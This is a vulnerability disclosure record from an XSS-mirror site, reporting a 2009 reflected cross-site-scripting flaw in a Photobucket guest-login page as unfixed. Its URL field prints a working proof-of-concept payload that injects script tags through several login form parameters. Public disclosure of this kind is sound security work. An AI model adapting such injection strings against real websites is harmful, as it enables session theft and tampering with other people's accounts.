Security researcher Azat Harutyunyan, has submitted on 27/05/2009 a cross-site-scripting (XSS) vulnerability affecting s558.photobucket.com, which at the time of submission ranked 40 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 27/05/2009 |
Date published: 13/06/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: Azat Harutyunyan |
Domain: s558.photobucket.com |
Category: XSS |
Pagerank: 40 |
URL: http://s558.photobucket.com/guestlogin?loginForm[albumUrl]=http://s289.photobucket.com/albums/ll233/ ><script>alert("xssed%20by%20azat")</script>><script>alert("xssed%20by%20azat")</script>><script>ale rt("xssed%20byazat")</script>><script>alert("xssed%20by%20azat")</script>><script>alert("xssed%20bya zat")</script>&loginForm[redirectAction]=&loginForm[password]=><script>alert("xssed')</script>&login =><script>alert("xssed")</script> |
Click here to view the mirror
|
|
|